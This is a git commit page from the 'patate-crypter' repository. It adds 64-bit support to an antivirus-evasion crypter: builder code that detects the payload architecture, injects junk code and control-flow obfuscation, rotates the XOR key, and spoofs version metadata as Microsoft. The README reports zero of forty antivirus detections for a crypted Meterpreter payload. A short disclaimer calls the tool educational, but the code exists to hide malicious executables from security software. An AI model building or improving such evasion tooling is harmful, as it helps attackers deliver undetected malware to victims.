patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add: x64 bit support, automatic detection of architecture, 0/40 detects in x64 bit

Browse Source
This commit is contained in:
ALittlePatate
2024-03-19 10:29:40 +01:00
parent 4d6b376c03
commit 4c45ea8422
8 changed files with 45 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
Builder/gui.py
View File

@@ -37,6 +37,7 @@ from PyQt5.QtGui import QPixmap
from obfuscation import obfuscate from obfuscation import obfuscate
from metadata import change_metadata from metadata import change_metadata
import os, shutil, glob import os, shutil, glob
import pefile
class Ui_mainWindow(object): class Ui_mainWindow(object):
def __init__(self) : def __init__(self) :
@@ -141,6 +142,7 @@ class Ui_mainWindow(object):
self.checkBox_3.setText(_translate("mainWindow", "Control flow")) self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
def generate(self) : def generate(self) :
is_64bit = False
in_filename = self.filepath in_filename = self.filepath
out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe" out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
xor_key = '' xor_key = ''
@@ -155,6 +157,19 @@ class Ui_mainWindow(object):
QCoreApplication.processEvents() QCoreApplication.processEvents()
return return
try :
pe = pefile.PE(in_filename)
except :
self.label_2.setText("File is not a binary.")
QCoreApplication.processEvents()
return
if hex(pe.FILE_HEADER.Machine) == '0x14c':
self.label_2.setText("File is a 32-bit binary")
else:
self.label_2.setText("File is a 64-bit binary")
is_64bit = True
QCoreApplication.processEvents()
self.label_2.setText("Creating sample header...") self.label_2.setText("Creating sample header...")
QCoreApplication.processEvents() QCoreApplication.processEvents()
@@ -184,7 +199,7 @@ class Ui_mainWindow(object):
self.label_2.setText("Adding junk code...") self.label_2.setText("Adding junk code...")
QCoreApplication.processEvents() QCoreApplication.processEvents()
obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk) obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk, is_64bit)
self.label_2.setText("done.") self.label_2.setText("done.")
QCoreApplication.processEvents() QCoreApplication.processEvents()
@@ -201,8 +216,12 @@ class Ui_mainWindow(object):
vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe" cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
if is_64bit :
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x64;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
else :
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
if return_code : if return_code :
self.label_2.setText("build failed.") self.label_2.setText("build failed.")
QCoreApplication.processEvents() QCoreApplication.processEvents()

4
Builder/obfuscation.py
View File

@@ -149,7 +149,7 @@ def GetRandomControlFlow():
return cpp_code return cpp_code
FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
def obfuscate(PASS, CFLOW_PASS, cflow, junk) : def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
if PASS < CFLOW_PASS : PASS = CFLOW_PASS if PASS < CFLOW_PASS : PASS = CFLOW_PASS
if not cflow and not junk : PASS = 0 if not cflow and not junk : PASS = 0
@@ -237,7 +237,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
if GetRandomBool() and in_func : # do we call a function ? if GetRandomBool() and in_func : # do we call a function ?
out.append(CallRandomFunction()+"\n") out.append(CallRandomFunction()+"\n")
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ? if GetRandomBool() and in_func and cflow and k < CFLOW_PASS and not is64bit : # do we mess up control flow ?
out.append(GetRandomAssemblyBlock()+"\n") out.append(GetRandomAssemblyBlock()+"\n")
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ? if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?

1
Builder/requirements.txt
View File

@@ -1,2 +1,3 @@
pillow pillow
pywin32 pywin32
pefile

2
Crypter/config.h
View File

@@ -1,2 +1,2 @@
#pragma once #pragma once
#define KEY "mkhjqsdhfjbzqfcqzf" #define KEY "pqihzifvqzidbzq"

8
Crypter/patate-crypter.rc
View File

@@ -68,12 +68,12 @@ BEGIN
BLOCK "040c04b0" BLOCK "040c04b0"
BEGIN BEGIN
VALUE "CompanyName", "Microsoft" VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "clgdknugqsthezarlwbq" VALUE "FileDescription", "mwqaxnynrtvjaafmtwew"
VALUE "FileVersion", "1.0.0.1" VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "yhoqres.exe" VALUE "InternalName", "hoflypx.exe"
VALUE "LegalCopyright", "Copyright (C) 2023" VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "erbggay.exe" VALUE "OriginalFilename", "ckhvspq.exe"
VALUE "ProductName", "awwmoqx.exe" VALUE "ProductName", "rrrxbyl.exe"
VALUE "ProductVersion", "1.0.0.1" VALUE "ProductVersion", "1.0.0.1"
END END
END END

19
Crypter/patate-crypter.vcxproj
View File

@@ -49,7 +49,7 @@
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset> <PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
@@ -138,6 +138,7 @@
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions> <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard> <LanguageStandard>stdcpp17</LanguageStandard>
<OmitFramePointers>false</OmitFramePointers>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
@@ -148,20 +149,24 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<WarningLevel>Level3</WarningLevel> <WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>false</IntrinsicFunctions>
<SDLCheck>true</SDLCheck> <SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard> <LanguageStandard>stdcpp17</LanguageStandard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<Optimization>Disabled</Optimization>
<OmitFramePointers>false</OmitFramePointers>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding> <EnableCOMDATFolding>false</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>false</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions> <AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions>
<GenerateWindowsMetadata>false</GenerateWindowsMetadata>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>

6
Crypter/patate-crypter.vcxproj.filters
View File

@@ -18,9 +18,6 @@
<ClCompile Include="main.cpp"> <ClCompile Include="main.cpp">
<Filter>Fichiers sources</Filter> <Filter>Fichiers sources</Filter>
</ClCompile> </ClCompile>
<ClCompile Include="anti_emu.cpp">
<Filter>Fichiers sources</Filter>
</ClCompile>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="config.h"> <ClInclude Include="config.h">
@@ -32,9 +29,6 @@
<ClInclude Include="sample.h"> <ClInclude Include="sample.h">
<Filter>Fichiers d%27en-tête</Filter> <Filter>Fichiers d%27en-tête</Filter>
</ClInclude> </ClInclude>
<ClInclude Include="anti_emu.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ResourceCompile Include="patate-crypter.rc"> <ResourceCompile Include="patate-crypter.rc">

5
README.md
View File

@@ -4,14 +4,15 @@ The project structure is **very** messy because i wasn't planning on releasing i
I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work. I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work.
# Limitations # Limitations
patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br> patate crypter officially supports 32bit and 64bit DLLs and PEs.<br>
There is an issue where the reallocations would fail for specific payloads, TOFIX.<br> There is an issue where the reallocations would fail for specific payloads, TOFIX.<br>
There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)). There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).
# Detection rate # Detection rate
There is currently 0/40 detections for a crypted meterperter : There is currently 0/40 detections for a crypted meterperter :
- [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e) - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
- [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54) - [crypted 32 bit](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
- [crypted 64 bit](https://www.kleenscan.com/scan_result/9c0ae91e19425ff4c2d8120f1cb787f0480c7780faa6e1e57517b2aea831e272)
# How does it work ? # How does it work ?
The crypter (compile time) works by : The crypter (compile time) works by :